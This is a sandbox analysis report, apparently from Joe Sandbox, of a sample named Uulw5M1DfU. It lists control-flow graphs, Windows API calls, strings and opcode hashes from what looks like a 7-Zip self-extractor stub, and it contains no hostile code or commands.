                                                                                                • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                                                                • Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                                                • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                                                                                • SetLastError.KERNEL32(00000010), ref: 0040303D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesErrorFileLast
                                                                                                • String ID:
                                                                                                • API String ID: 1799206407-0
                                                                                                • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                                                • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                                                                                • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                                                • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                                                                                APIs
                                                                                                • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                                                                                • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: DiskFreeMessageSendSpace
                                                                                                • String ID:
                                                                                                • API String ID: 696007252-0
                                                                                                • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                                                • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                                                                                • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                                                • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                • String ID: HpA
                                                                                                • API String ID: 801014965-2938899866
                                                                                                • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                                                • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                                                                                • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                                                • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                                                • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                                                • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                                                • DispatchMessageW.USER32(?), ref: 00401B89
                                                                                                • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                                                • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                                                • String ID: Static
                                                                                                • API String ID: 2479445380-2272013587
                                                                                                • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                                • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                                                                • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                                • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                                                                                APIs
                                                                                                • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                                                                                • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@memcpymemmove
                                                                                                • String ID:
                                                                                                • API String ID: 3549172513-3916222277
                                                                                                • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                                                • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                                                                                • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                                                • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 851 4033f8-4033fa 838->851 852 403419-40341b 839->852 853 40340a-403417 call 407776 839->853 840->831 847 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->847 848 40347f-40348a 841->848 844->837 849 4033b6 844->849 864 4034bc-4034c0 847->864 848->847 854 40348c-403490 848->854 849->835 858 40349c-4034a5 ??3@YAXPAX@Z 851->858 855 40346b-403475 ??3@YAXPAX@Z 852->855 856 40341d-40343c memcpy 852->856 853->851 854->847 860 403492-403497 854->860 855->864 862 403451-403455 856->862 863 40343e 856->863 858->864 860->847 861 403499-40349b 860->861 861->858 867 403440-403448 862->867 868 403457-403464 call 401986 862->868 866 403450 863->866 866->862 867->868 869 40344a-40344e 867->869 868->853 872 403466-403469 868->872 869->866 869->868 872->855 872->856
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                                                  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 846840743-0
                                                                                                • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                                                • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                                                                                • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                                                • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                  • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                                  • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                  • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                  • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                  • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                                  • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                                                                  • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                                                                • wsprintfW.USER32 ref: 004044A7
                                                                                                  • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                                • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                                • String ID: 7zSfxFolder%02d$IA
                                                                                                • API String ID: 3387708999-1317665167
                                                                                                • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                                • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                                                • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                                • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 925 408f26 923->925 926 408f19-408f24 923->926 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 925->927 926->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 944 409199-4091b0 935->944 945 409019-40901c 935->945 939 409020-409035 call 40e8da call 40874d 936->939 965 408fb0-408fb2 937->965 966 408fb6-408fbb 937->966 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 944->952 953 40934c-409367 call 4087ea 944->953 945->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 970 4090ad-4090b3 955->970 971 40907f 955->971 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 963 409051-409061 call 408726 958->963 959->963 987 409063-409066 963->987 988 409068 963->988 965->966 968 408fc3-408fcf 966->968 969 408fbd-408fbf 966->969 968->922 968->923 969->968 981 409187-409196 call 408e83 970->981 982 4090b9-4090d9 call 40d94b 970->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 971->977 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->970 1016 409261-409264 978->1016 1017 4092c9 978->1017 985 4091f7-409209 979->985 986 4092b9-4092bb 979->986 981->944 997 4090de-4090e6 982->997 999 4093a4-4093b8 call 408761 983->999 1000 4093ba-4093d6 983->1000 1013 409293-409295 985->1013 1014 40920f-409211 985->1014 1001 4092bf-4092c4 986->1001 994 40906a 987->994 988->994 994->955 1005 409283-409288 997->1005 1006 4090ec-4090f3 997->1006 999->1000 1080 4093d7 call 40ce70 1000->1080 1081 4093d7 call 40f160 1000->1081 1001->977 1011 409290 1005->1011 1012 40928a-40928c 1005->1012 1007 409121-409124 1006->1007 1008 4090f5-4090f9 1006->1008 1022 4092b2-4092b7 1007->1022 1023 40912a-409138 call 408726 1007->1023 1008->1007 1018 4090fb-4090fe 1008->1018 1011->1013 1012->1011 1025 409297-409299 1013->1025 1026 40929d-4092a0 1013->1026 1014->978 1024 409213-409215 1014->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->986 1022->1001 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1049 409281 1027->1049 1028->1046 1050 409114-40911f call 40d6cb 1028->1050 1029->1001 1041 4092ac-4092ae 1029->1041 1036 4092d4-4092e0 call 408a55 1030->1036 1037 40931d-409346 call 40e959 * 2 1030->1037 1057 4092e2-4092ec 1036->1057 1058 4092ee-4092fa call 408aa0 1036->1058 1037->953 1037->957 1041->1022 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1049->1030 1050->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1065 409165-409167 1060->1065 1066 40916b-409170 1060->1066 1063->1036 1063->1037 1065->1066 1071 409172-409174 1066->1071 1072 409178-409181 1066->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                                                                                APIs
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@
                                                                                                • String ID: IA$IA
                                                                                                • API String ID: 1033339047-1400641299
                                                                                                • Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                                                • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                                                                • Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                                                • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID: $KA$4KA$HKA$\KA
                                                                                                • API String ID: 1294909896-3316857779
                                                                                                • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                                • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                                                                • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                                • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
